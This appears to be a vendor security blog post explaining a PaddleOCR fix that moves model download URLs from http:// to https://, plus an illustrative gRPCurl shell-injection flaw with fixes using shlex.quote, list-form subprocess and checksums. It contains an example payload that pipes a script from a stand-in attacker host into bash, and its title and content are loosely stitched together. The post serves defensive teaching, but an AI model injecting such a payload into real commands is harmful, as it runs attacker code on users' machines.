What is an insecure cleartext HTTP download vulnerability?

It occurs when an application fetches files over unencrypted HTTP, allowing a network attacker to intercept and replace the downloaded content with malicious data before it reaches the user.

How do you prevent insecure model downloads in PaddleOCR?

Replace all `http://` model download URLs in the deployment configuration with `https://` URLs, and optionally add checksum verification to confirm file integrity after download.

What CWE is insecure cleartext HTTP download?

CWE-319: Cleartext Transmission of Sensitive Information. For the specific risk of downloading untrusted executables or models, CWE-494 (Download of Code Without Integrity Check) is also relevant.

Is switching to HTTPS enough to prevent model tampering?

HTTPS prevents passive eavesdropping and basic MitM substitution, but for full integrity assurance you should also verify a cryptographic checksum (SHA-256) of the downloaded model file against a known-good value.

Can static analysis detect insecure HTTP download URLs?

Yes. Tools like Semgrep can scan configuration files and source code for `http://` patterns in download-related contexts and flag them automatically, as Orbis AppSec did here.

Shell Injection via Unsafe String Concatenation in gRPCurl Command Generation

Introduction

When we think about application security, we often focus on the obvious attack surfaces — login forms, API endpoints, user inputs. But some of the most dangerous vulnerabilities hide in plain sight: in configuration files, in helper scripts, and in the small decisions developers make when wiring systems together.

This post examines a high-severity vulnerability found in PaddleOCR's deployment configuration — specifically, the use of unencrypted http:// URLs for downloading machine learning model files. While this might seem like a minor oversight, the consequences can be severe: a network-positioned attacker can silently replace legitimate model files with malicious ones, potentially turning your OCR pipeline into a backdoor.

We'll also explore the broader context of shell injection via unsafe string concatenation in gRPCurl command generation — a related attack pattern that developers working with gRPC tooling must understand.

The Vulnerability Explained

What Went Wrong?

The vulnerability lives in deploy/hubserving/ocr_system/params.py, the configuration module for PaddleOCR's serving infrastructure. The original code specified model download URLs using plain http://:

# VULNERABLE: Unencrypted HTTP download URLs
cfg.det_model_url = "http://paddle-ocr-models.bj.bcebos.com/dygraph_v2.0/ch/ch_pp-ocrv2_det_infer.tar"
cfg.rec_model_url = "http://paddle-ocr-models.bj.bcebos.com/dygraph_v2.0/ch/ch_pp-ocrv2_rec_infer.tar"
cfg.cls_model_url = "http://paddle-ocr-models.bj.bcebos.com/dygraph_v2.0/ch/ch_ppocr_mobile_v2.0_cls_infer.tar"

At the same time, the related gRPCurl command generation code uses unsafe string concatenation to build shell commands from user-controlled values — including headers, endpoints, and data pulled from API responses — without any shell escaping. This means an attacker who can influence those values can inject shell metacharacters.

Two Vulnerabilities, One Root Cause: Insufficient Input Handling

These two issues share a common theme: trusting external data without sanitization or secure transport.

HTTP model downloads — No encryption means no integrity. Anyone on the same network (coffee shop Wi-Fi, shared cloud VPC, compromised router) can perform a Man-in-the-Middle (MitM) attack.
Shell injection in gRPCurl commands — When user-controlled strings from API responses are interpolated directly into shell command strings, attackers can break out of the intended command structure.

How Could It Be Exploited?

Attack Scenario 1: Model File Poisoning via HTTP MitM

Imagine a developer or automated CI/CD pipeline running PaddleOCR's model download script on a shared cloud network:

Developer Machine ──HTTP──► [ATTACKER in the middle] ──► Model Server
                                      │
                                      ▼
                         Serves malicious .tar file
                         containing backdoored model

Because the download uses plain http://, there is:
- No encryption — the attacker can read the traffic
- No integrity check at the transport layer — the attacker can modify the response
- No certificate validation — the client has no way to verify the server's identity

The attacker serves a .tar file that, when extracted, contains a model file crafted to exploit deserialization vulnerabilities, or a __init__.py that executes arbitrary code when the model is loaded.

Attack Scenario 2: Shell Injection via gRPCurl Command Generation

Consider a helper function that builds a grpcurl command for users to copy and run:

# VULNERABLE pattern (illustrative)
def build_grpcurl_command(endpoint, header, data):
    cmd = f"grpcurl -H '{header}' -d '{data}' {endpoint} service.Method"
    return cmd

If data comes from an API response or user input and contains:

'; curl http://attacker.com/shell.sh | bash; echo '

The generated command becomes:

grpcurl -H 'Authorization: Bearer token' -d ''; curl http://attacker.com/shell.sh | bash; echo '' endpoint service.Method

When the user pastes and runs this command, arbitrary code executes on their machine.

Real-World Impact

Risk	Description
Model Integrity	Poisoned models can produce incorrect OCR results, enabling fraud or bypassing security checks
Code Execution	Malicious model files can execute code during loading via unsafe deserialization
Supply Chain Attack	Compromised models distributed to all users of the system
Shell Code Execution	Injected shell commands run with the privileges of the user who pastes the gRPCurl command

The Fix

What Changed?

The fix is elegantly simple — all three model download URLs were upgraded from http:// to https://:

- cfg.det_model_url = "http://paddle-ocr-models.bj.bcebos.com/dygraph_v2.0/ch/ch_pp-ocrv2_det_infer.tar"
- cfg.rec_model_url = "http://paddle-ocr-models.bj.bcebos.com/dygraph_v2.0/ch/ch_pp-ocrv2_rec_infer.tar"
- cfg.cls_model_url = "http://paddle-ocr-models.bj.bcebos.com/dygraph_v2.0/ch/ch_ppocr_mobile_v2.0_cls_infer.tar"

+ cfg.det_model_url = "https://paddle-ocr-models.bj.bcebos.com/dygraph_v2.0/ch/ch_pp-ocrv2_det_infer.tar"
+ cfg.rec_model_url = "https://paddle-ocr-models.bj.bcebos.com/dygraph_v2.0/ch/ch_pp-ocrv2_rec_infer.tar"
+ cfg.cls_model_url = "https://paddle-ocr-models.bj.bcebos.com/dygraph_v2.0/ch/ch_ppocr_mobile_v2.0_cls_infer.tar"

Why This Works

HTTPS provides three critical security properties that HTTP lacks:

Confidentiality — TLS encryption prevents eavesdropping on the download
Integrity — TLS's MAC (Message Authentication Code) detects tampering in transit
Authentication — Certificate validation ensures you're talking to the real server, not an impersonator

Fixing Shell Injection: The Right Approach

For the gRPCurl command generation issue, the fix requires proper shell escaping. Here's how to do it safely in Python:

import shlex

# SAFE: Use shlex.quote() to escape all user-controlled values
def build_grpcurl_command(endpoint, header, data):
    safe_header = shlex.quote(header)
    safe_data = shlex.quote(data)
    safe_endpoint = shlex.quote(endpoint)

    cmd = f"grpcurl -H {safe_header} -d {safe_data} {safe_endpoint} service.Method"
    return cmd

shlex.quote() wraps the string in single quotes and escapes any single quotes within the string, making it impossible for shell metacharacters to break out of their intended context.

Even better — avoid shell commands entirely when possible:

import subprocess

# BEST: Use subprocess with a list of arguments (no shell=True)
def run_grpcurl(endpoint, header, data):
    result = subprocess.run(
        ["grpcurl", "-H", header, "-d", data, endpoint, "service.Method"],
        capture_output=True,
        text=True,
        shell=False  # Never use shell=True with user input
    )
    return result.stdout

When you pass a list of arguments to subprocess.run() with shell=False, the OS handles argument separation directly — there is no shell to inject into.

Prevention & Best Practices

1. Always Use HTTPS for Downloading Artifacts

This is a non-negotiable baseline for any production system:

# ❌ Never do this
url = "http://example.com/model.tar"

# ✅ Always do this
url = "https://example.com/model.tar"

Go further by also verifying checksums after download:

import hashlib
import requests

def download_and_verify(url: str, expected_sha256: str, dest_path: str):
    response = requests.get(url, stream=True)
    response.raise_for_status()

    sha256 = hashlib.sha256()
    with open(dest_path, 'wb') as f:
        for chunk in response.iter_content(chunk_size=8192):
            f.write(chunk)
            sha256.update(chunk)

    actual = sha256.hexdigest()
    if actual != expected_sha256:
        raise ValueError(f"Checksum mismatch! Expected {expected_sha256}, got {actual}")

    return dest_path

2. Never Use String Concatenation for Shell Commands

Approach	Safety	Recommendation
`os.system(f"cmd {user_input}")`	❌ Dangerous	Never use
`subprocess.run(cmd_string, shell=True)`	❌ Dangerous	Avoid with user input
`subprocess.run([...], shell=False)`	✅ Safe	Preferred
`shlex.quote()` + string	⚠️ Acceptable	Use when list form isn't possible

3. Treat All External Data as Untrusted

Values from API responses, configuration files, environment variables, and network responses should all be treated as potentially hostile:

# Validate and sanitize before use
import re

def validate_endpoint(endpoint: str) -> str:
    # Only allow valid hostname:port patterns
    pattern = r'^[a-zA-Z0-9.-]+:\d{1,5}$'
    if not re.match(pattern, endpoint):
        raise ValueError(f"Invalid endpoint format: {endpoint}")
    return endpoint

4. Security Scanning Tools

Integrate these tools into your CI/CD pipeline to catch these issues automatically:

Bandit — Python security linter that detects shell=True, HTTP URLs, and other issues
Safety — Checks Python dependencies for known vulnerabilities
Semgrep — Static analysis with rules for shell injection, insecure URLs, and more
Trivy — Container and filesystem scanning for misconfigurations

# Run Bandit on your codebase
pip install bandit
bandit -r deploy/ -ll

# Example output for this vulnerability:
# >> Issue: [B310:urllib_urlopen] Audit url open for permitted schemes. 
#    Allowing use of file:/ or custom schemes is often unexpected.
#    Severity: Medium   Confidence: High

5. Relevant Security Standards

CWE-78: Improper Neutralization of Special Elements used in an OS Command (OS Command Injection)
CWE-319: Cleartext Transmission of Sensitive Information
OWASP A03:2021: Injection — covers shell injection and command injection
OWASP A02:2021: Cryptographic Failures — covers insecure HTTP transmission

Conclusion

This vulnerability is a reminder that security is in the details. Two characters — changing http to https — stand between a secure model download pipeline and a potential supply chain attack. Similarly, one function call — shlex.quote() or switching to subprocess.run() with a list — is the difference between a safe CLI helper and a remote code execution vector.

Key Takeaways

🔒 Always use HTTPS for downloading any external files, especially binary artifacts like ML models
🧹 Never concatenate user-controlled strings into shell commands — use shlex.quote() or argument lists
🔍 Treat all external data as untrusted, including API response values used in command generation
🤖 Automate security scanning with tools like Bandit and Semgrep to catch these patterns in CI/CD
✅ Verify checksums of downloaded files to add a second layer of integrity protection beyond TLS

Security isn't about writing perfect code — it's about building habits and systems that make the secure choice the easy choice. Upgrading a URL scheme and using proper escaping functions are exactly the kind of small, high-impact changes that make software meaningfully safer.

Stay secure, and keep shipping. 🛡️

cwe	CWE-319
fix	Upgrade all model download URLs from `http://` to `https://`
risk	Man-in-the-middle attacker replaces downloaded OCR model binaries with malicious files
language	Python / Shell (PaddleOCR deployment config)
root cause	Model download URLs hard-coded with `http://` instead of `https://`
vulnerability	Insecure Cleartext HTTP Model Download

Shell Injection via Unsafe String Concatenation in PaddleOCR Deployment

Answer Summary

Vulnerability at a Glance

Shell Injection via Unsafe String Concatenation in gRPCurl Command Generation

Introduction

The Vulnerability Explained

What Went Wrong?

Two Vulnerabilities, One Root Cause: Insufficient Input Handling

How Could It Be Exploited?

Attack Scenario 1: Model File Poisoning via HTTP MitM

Attack Scenario 2: Shell Injection via gRPCurl Command Generation

Real-World Impact

The Fix

What Changed?

Why This Works

Fixing Shell Injection: The Right Approach

Prevention & Best Practices

1. Always Use HTTPS for Downloading Artifacts

2. Never Use String Concatenation for Shell Commands

3. Treat All External Data as Untrusted

4. Security Scanning Tools

5. Relevant Security Standards

Conclusion

Key Takeaways

Frequently Asked Questions

What is an insecure cleartext HTTP download vulnerability?

How do you prevent insecure model downloads in PaddleOCR?

What CWE is insecure cleartext HTTP download?

Is switching to HTTPS enough to prevent model tampering?

Can static analysis detect insecure HTTP download URLs?

View the Security Fix

Related Articles

How command injection happens in Go ffmpeg-go and how to fix it

How command injection happens in Python os.popen() and how to fix it

How command injection happens in Node.js subprocess and how to fix it

How command injection happens in Python subprocess and how to fix it

How command injection happens in Python subprocess and how to fix it

How command injection happens in Python subprocess and how to fix it